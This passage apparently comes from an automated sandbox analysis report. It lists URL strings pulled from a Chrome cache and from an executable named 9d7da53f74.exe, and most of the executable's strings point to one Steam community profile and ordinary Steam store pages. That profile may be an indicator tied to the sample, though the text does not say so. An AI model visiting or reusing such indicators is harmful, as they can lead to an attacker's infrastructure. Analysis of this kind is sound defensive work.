                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_parental_controls_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_school_time_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_school_time_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/location_sharing_enabled_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/location_sharing_enabled_dark_3.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/parent_sign_in_prologue_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/parent_sign_in_prologue_dark_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_complete_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_complete_dark_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_contacts_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_contacts_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_family_link_boy_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_family_link_boy_dark_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_family_link_girl_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_family_link_girl_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/ulp_continue_without_gmail_dark_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/ulp_continue_without_gmail_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/all_set.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/all_set_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/are_you_sure_parent.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/are_you_sure_parent_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/content_restriction.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/content_restriction_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/error.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/error_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/how_controls_work.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/how_controls_work_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/next_steps.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/next_steps_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/setup_controls.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/setup_controls_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_parent.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_parent_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_teen.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_teen_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teentoadultgraduation/supervision_choice.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/teentoadultgraduation/supervision_choice_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/kid_setup_parent_escalation.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/kid_setup_parent_escalation_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/send_email_confirmation.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/send_email_confirmation_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/success_sent_email.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/success_sent_email_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulpupgrade/kidprofileupgrade_all_set.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/ulpupgrade/kidprofileupgrade_all_set_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/all_set.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/all_set_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/almost_done_kids_space_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/almost_done_kids_space_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_tablet_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_tablet_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/emailinstallfamilylink.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/emailinstallfamilylink_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/familylinkinstalling.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/familylinkinstalling_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/hand_over_device_dark_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/hand_over_device_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/linking_accounts_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/linking_accounts_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/locationsetup.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/locationsetup_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space_dark.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess_dark.svg
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/0
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
                                Source: 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511757366.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.000000000175A000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000175A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2746326471.000000000175A000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000175A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319001l
                                Source: 9d7da53f74.exe, 0000003C.00000002.2746326471.000000000175A000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000175A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900u
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65E
                                Source: 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
